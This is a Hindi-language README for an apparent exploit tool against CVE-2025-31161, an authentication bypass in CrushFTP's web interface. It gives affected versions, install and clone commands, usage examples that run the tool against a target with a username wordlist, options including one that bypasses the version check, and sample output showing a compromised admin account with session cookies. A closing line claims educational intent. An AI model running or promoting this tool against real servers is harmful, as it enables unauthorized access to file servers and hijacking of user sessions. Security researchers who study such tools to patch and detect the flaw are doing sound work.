
CrushFTP CVE-2025-31161 एक्सप्लॉइट टूल 🔓
CVE-2025-31161 CrushFTP वेब इंटरफ़ेस में एक गंभीर प्रमाणीकरण बायपास भेद्यता है। HTTP Authorization हेडर में हेरफेर करके, एक अप्रमाणित हमलावर सही पासवर्ड दिए बिना किसी भी मान्य उपयोगकर्ता नाम के तहत पूर्ण पहुँच प्राप्त कर सकता है।
प्रभावित संस्करण
CrushFTP 9.3.8
CrushFTP 9.3.9
CrushFTP 9.3.10
CrushFTP 9.3.11
CrushFTP 9.3.12
CrushFTP Enterprise 9.3.12.5 से पहले के संस्करण
Python 3.8+
आवश्यक पैकेज:
pip install requests colorama urllib3
pip install requests colorama urllib3
git clone https://github.com/TX-One/CVE-2025-31161.git
cd CVE-2025-31161
python3 tx-crush.py -h
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-t, --target TARGET लक्ष्य URL (जैसे, https://example.com:8080)
-u, --users USERS उपयोगकर्ता नाम सूची वाली फ़ाइल
-o, --output OUTPUT आउटपुट JSON फ़ाइल
-T, --threads THREADS
थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
--no-ssl SSL सत्यापन अक्षम करें
--timeout TIMEOUT अनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--retries RETRIES पुनः प्रयासों की संख्या (डिफ़ॉल्ट: 3)
--force संस्करण जाँच को बायपास करें
python3 exploit.py
-t https://vulnerable-server.com:8000
-u ./wordlists/common_users.txt
-o ./results/compromised.json
-T 10
--retries 5
--timeout 20
[
{
"target": "https://victim:8080",
"user": "admin",
"success": true,
"method": "Bearer",
"cookies": {"sessionID": "a1b2c3..."},
"server_version": "CrushFTP/9.3.12"
}
]
[
{
"target": "http://victim:8080",
"user": "admin",
"success": false
}
]
अस्वीकरण: यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। जिम्मेदार उपयोग आवश्यक है।